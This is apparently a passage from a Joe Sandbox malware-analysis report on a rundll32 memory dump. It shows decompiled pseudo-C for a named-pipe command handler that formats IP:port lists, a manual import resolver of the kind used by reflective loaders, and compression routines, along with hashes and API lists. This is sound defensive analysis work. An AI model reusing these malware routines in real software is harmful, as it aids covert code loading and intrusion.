            • API String ID: 1610782348-0
            • Opcode ID: 6c1f3e05b24fa66073d022e9c5e7469d9dfb20b8fa6933aebb7ead6b3f492f9a
            • Instruction ID: 083313eebf1e1e88cb9a1657dc24859959024408a74a53005d66343b4b96a0eb
            • Opcode Fuzzy Hash: 6c1f3e05b24fa66073d022e9c5e7469d9dfb20b8fa6933aebb7ead6b3f492f9a
            • Instruction Fuzzy Hash: A5210C74600245BBEF248BA6DC4DE9BBF7CEFC6B15F20015DF905962A1D6B1AA00CA61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044633DA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E044633DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L04463533();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E044633B3(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E04458ECB(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x4461bc5
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













            0x044633da
            0x044633dd
            0x044633e2
            0x044633e6
            0x044633e6
            0x044633ec
            0x044633f0
            0x044633f1
            0x044633f4
            0x044633f5
            0x044633fa
            0x044633fd
            0x044633fe
            0x04463403
            0x0446340a
            0x04463493
            0x04463493
            0x00000000
            0x04463415
            0x04463416
            0x04463428
            0x0446344e
            0x0446344e
            0x04463457
            0x04463459
            0x0446345f
            0x0446348e
            0x0446348e
            0x04463496
            0x04463499
            0x04463499
            0x04463461
            0x04463462
            0x04463468
            0x0446346a
            0x0446346a
            0x0446346f
            0x0446346e
            0x0446346e
            0x04463476
            0x04463482
            0x0446348c
            0x0446348c
            0x00000000
            0x04463438
            0x04463438
            0x04463438
            0x0446343e
            0x00000000
            0x00000000
            0x04463440
            0x04463446
            0x0446344b
            0x00000000
            0x0446344b
            0x04463428

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: 053b1fdf51ef7d84cac630fd33a350b14df4190b8e4979093e763c3fad69b8fd
            • Instruction ID: 3bd4754f376f78a89d953c19098fe15a1ba8b3c65932e0e479dbb0099b8fa5ac
            • Opcode Fuzzy Hash: 053b1fdf51ef7d84cac630fd33a350b14df4190b8e4979093e763c3fad69b8fd
            • Instruction Fuzzy Hash: 7D215B3270469427EF329E9DEC86BABB7989F01768F14002BFC4786281E6A0F94143D3
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04453775 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310pipeCOMMON
            Download Yara Rule
            C-Code - Quality: 62%
            			E04453775(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				signed int _t145;
				signed int _t147;
				signed short* _t148;
				signed int _t158;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				signed short* _t191;
				void* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t207;
				void* _t209;
				void* _t215;
				void* _t222;

				_t222 = __fp0;
				_t209 = (_t207 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x446f8d0; // 0x450f8c0
					_push(0);
					_push( *0x446f8b4);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x446f8d0; // 0x450f8c0
					_push(0x80000);
					_push( *0x446f974);
					_push( *0x446f8b4);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t148 =  *0x446f974; // 0x0
						_t80 =  *_t148 & 0x0000ffff;
						_t215 = _t80 - 8;
						if(_t215 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E044609C3( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t186);
								E0445D297(_t186);
								L32:
								L56:
								DisconnectNamedPipe( *0x446f8b4);
								_push(0);
								_pop(0);
								_push(1);
								_pop(1);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E044516B0( &_v204, _t222);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t145 = _v204;
								_t90 = _t145 * 0x16;
								_v184 = _t145 * 0x16;
								_t203 = E04458DC9(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t187 = 0xa;
									E0445D297(_t187);
									L52:
									E04458DDF( &_v188, _t145);
									goto L32;
								}
								_t198 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L50:
									_push(E0445A5D0(_t203));
									_push(_t203);
									_t188 = 5;
									E0445D297(_t188);
									E04458DDF( &_v192, 0xffffffff);
									_t209 = _t209 + 0x10;
									goto L52;
								}
								_t158 = _v188 + 4;
								__eflags = _t158;
								_v204 = _t158;
								do {
									__eflags = _t198;
									if(_t198 != 0) {
										__eflags = _t198 - _t145 - 1;
										if(_t198 < _t145 - 1) {
											_t102 = E0445A5D0(_t203);
											_t158 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t158;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E0445A5D0(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E0445A5D0(_t203) + _t203;
										__eflags = _t110;
										E04459FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t158 = _v204;
										_t209 = _t209 + 0x20;
									}
									_t198 = _t198 + 1;
									_t158 = _t158 + 0x20;
									_v204 = _t158;
									__eflags = _t198 - _t145;
								} while (_t198 < _t145);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E044516B0( &_v204, _t222);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E04458DDF( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t215 == 0) {
							_t84 = E044609C3( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t199 = E04459D29( &(_t148[4]), 0x20, 1,  &_v176);
							_v196 = _t199;
							__eflags = _t199;
							if(_t199 == 0) {
								L30:
								_t191 =  *0x446f974; // 0x0
								E0445A06E( &_v164,  &(_t191[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E04451D97(E0445A102( *_t199, __eflags), 0, 0, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E04458DC9(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t147 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E04451D97(E0445A102( *_t199, __eflags), _t127, _v184, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t129;
								E04459E22( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E04459A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0445A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
								_t182 = _v204;
								_t147 = _t147 + 1;
								 *_t182 = _t132;
								_v204 = _t182 + 4;
								__eflags = _t147 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t195 = 5;
							E0445D297(_t195);
							 *0x446f9a8 = 1;
							_v172 = 1;
							goto L56;
						}
						_t136 = _t133;
						if(_t136 == 0) {
							_t84 = E044609A1( &_v200);
							goto L16;
						}
						if(_t136 != 1) {
							goto L56;
						}
						E044609A1( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































            0x04453775
            0x0445377b
            0x04453788
            0x0445378d
            0x04453791
            0x04453791
            0x04453796
            0x04453797
            0x0445379d
            0x044537a9
            0x00000000
            0x00000000
            0x044537bc
            0x044537c1
            0x044537c2
            0x044537c7
            0x044537cc
            0x044537d2
            0x044537e0
            0x04453aec
            0x00000000
            0x044537f1
            0x044537f1
            0x044537f7
            0x044537fa
            0x044537fd
            0x0445396b
            0x0445396b
            0x0445396e
            0x04453ae2
            0x0445382c
            0x0445382d
            0x04453831
            0x04453831
            0x04453833
            0x04453833
            0x04453834
            0x0445394f
            0x0445394f
            0x04453950
            0x04453955
            0x04453af2
            0x04453af8
            0x04453b03
            0x04453b05
            0x04453b06
            0x04453b08
            0x04453b09
            0x00000000
            0x00000000
            0x00000000
            0x04453b09
            0x04453975
            0x04453975
            0x04453978
            0x044539bd
            0x044539c1
            0x044539c6
            0x044539ca
            0x044539cc
            0x04453acd
            0x04453ad3
            0x04453ad7
            0x04453852
            0x04453852
            0x00000000
            0x04453852
            0x044539d2
            0x044539d6
            0x044539da
            0x044539e3
            0x044539e5
            0x044539ea
            0x044539ec
            0x04453aa7
            0x04453aa7
            0x04453aa7
            0x04453ab0
            0x04453ab2
            0x04453ab5
            0x04453ab6
            0x04453abd
            0x04453ac3
            0x00000000
            0x04453ac3
            0x044539f2
            0x044539f4
            0x044539f6
            0x04453a85
            0x04453a8c
            0x04453a8d
            0x04453a90
            0x04453a91
            0x04453a9d
            0x04453aa2
            0x00000000
            0x04453aa2
            0x04453a00
            0x04453a00
            0x04453a03
            0x04453a07
            0x04453a07
            0x04453a09
            0x04453a0e
            0x04453a10
            0x04453a13
            0x04453a19
            0x04453a1d
            0x04453a1d
            0x04453a10
            0x04453a23
            0x04453a25
            0x04453a29
            0x04453a2b
            0x04453a2e
            0x04453a35
            0x04453a3e
            0x04453a44
            0x04453a49
            0x04453a52
            0x04453a6a
            0x04453a6a
            0x04453a6d
            0x04453a72
            0x04453a76
            0x04453a76
            0x04453a79
            0x04453a7a
            0x04453a7d
            0x04453a81
            0x04453a81
            0x00000000
            0x04453a07
            0x0445397a
            0x0445397d
            0x00000000
            0x00000000
            0x04453987
            0x0445398b
            0x04453990
            0x04453994
            0x04453998
            0x0445399a
            0x044539a2
            0x044539a8
            0x044539ac
            0x044539b0
            0x00000000
            0x044539b0
            0x04453803
            0x04453961
            0x04453845
            0x04453846
            0x04453848
            0x04453850
            0x04453851
            0x00000000
            0x04453851
            0x0445384a
            0x00000000
            0x0445384a
            0x04453809
            0x0445380c
            0x04453884
            0x04453886
            0x0445388c
            0x0445388e
            0x0445392b
            0x0445392b
            0x0445393d
            0x04453943
            0x0445394c
            0x0445394d
            0x00000000
            0x0445394d
            0x04453894
            0x04453898
            0x0445389b
            0x0445391f
            0x04453924
            0x04453927
            0x00000000
            0x04453927
            0x0445389d
            0x044538a0
            0x044538a8
            0x044538ad
            0x044538b2
            0x044538b4
            0x00000000
            0x00000000
            0x044538b8
            0x044538b9
            0x044538bb
            0x044538ea
            0x044538f9
            0x044538fe
            0x04453901
            0x0445390d
            0x00000000
            0x0445390d
            0x044538bd
            0x044538c1
            0x044538cf
            0x044538d4
            0x044538d8
            0x044538d9
            0x044538de
            0x044538e2
            0x044538e2
            0x044538e6
            0x00000000
            0x044538e6
            0x0445380e
            0x04453811
            0x04453859
            0x0445385a
            0x0445385d
            0x0445385e
            0x04453865
            0x0445386b
            0x00000000
            0x0445386b
            0x04453814
            0x04453817
            0x04453840
            0x00000000
            0x04453840
            0x0445381c
            0x00000000
            0x00000000
            0x04453827
            0x00000000
            0x04453827
            0x044537e0
            0x04453b17

            APIs
            • GetLastError.KERNEL32 ref: 044537AB
              • Part of subcall function 0445D297: FlushFileBuffers.KERNEL32(00000000,?,04453ABB,00000000,00000004), ref: 0445D2DD
            • DisconnectNamedPipe.KERNEL32 ref: 04453AF8
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: 4e61b633f812711b8b2d7d40644f5c8056e45b6306592989a9735585ef288c03
            • Instruction ID: 7fc0c868197c8fdb76d932498914ff471f646beb7e62527716b7cc18ea354077
            • Opcode Fuzzy Hash: 4e61b633f812711b8b2d7d40644f5c8056e45b6306592989a9735585ef288c03
            • Instruction Fuzzy Hash: 9BA1B3B1508301AFEF14EF65D884A2BB7E8EB84354F04491FFD55962A2EB34E9098B52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0446376C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E0446376C(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0445F024(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























            0x0446376c
            0x04463772
            0x0446377a
            0x0446378f
            0x044637a1
            0x044637ad
            0x044637b3
            0x044637b8
            0x044637c4
            0x0446392f
            0x00000000
            0x0446392f
            0x044637ca
            0x044637d3
            0x044637e1
            0x044637e4
            0x044637f3
            0x044637f3
            0x044637fa
            0x04463808
            0x0446380b
            0x0446381b
            0x04463828
            0x0446382f
            0x0446383f
            0x04463851
            0x04463857
            0x04463841
            0x04463849
            0x04463849
            0x0446385a
            0x0446385e
            0x0446386a
            0x0446386e
            0x04463872
            0x04463876
            0x04463882
            0x044638ad
            0x044638b5
            0x044638bb
            0x044638c7
            0x044638d3
            0x04463884
            0x04463889
            0x04463894
            0x044638a0
            0x044638a0
            0x044638dc
            0x044638e2
            0x044638ec
            0x04463908
            0x044638ee
            0x044638f1
            0x044638fd
            0x044638fd
            0x044638ec
            0x04463910
            0x04463919
            0x04463919
            0x04463927
            0x00000000
            0x04463927
            0x04463833
            0x00000000
            0x04463833
            0x00000000
            0x0446380b
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 04463789
            • LoadLibraryA.KERNEL32(00000000), ref: 04463822
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: b6344fd5776f79e4e5e24725d974bf44b1be6e03923eb9d937bd75eeac8dde25
            • Instruction ID: 6c5ad0cb0f807e9836731de2dbe5fcce35ab083a7f08a5d3bc68349a3700d632
            • Opcode Fuzzy Hash: b6344fd5776f79e4e5e24725d974bf44b1be6e03923eb9d937bd75eeac8dde25
            • Instruction Fuzzy Hash: B0618C75A00249EFDF10CF98C485BADBBF1BB08315F24849AE816AB391D374AA85DF51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04464160 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
            Download Yara Rule
            C-Code - Quality: 99%
            			E04464160(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x5d08408b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x51ec8b55
					_t12 = _t272 + 0x5c; // 0xee85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E04467180(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E04465EE0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xee85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E04466020( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x51ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x51ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8508458b
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x51ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x51ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x830a74c0
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xee85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8508458b
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x51ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E04466020(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x51ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x5d08408b
						_t123 = _t272 + 0xc; // 0x452bf84d
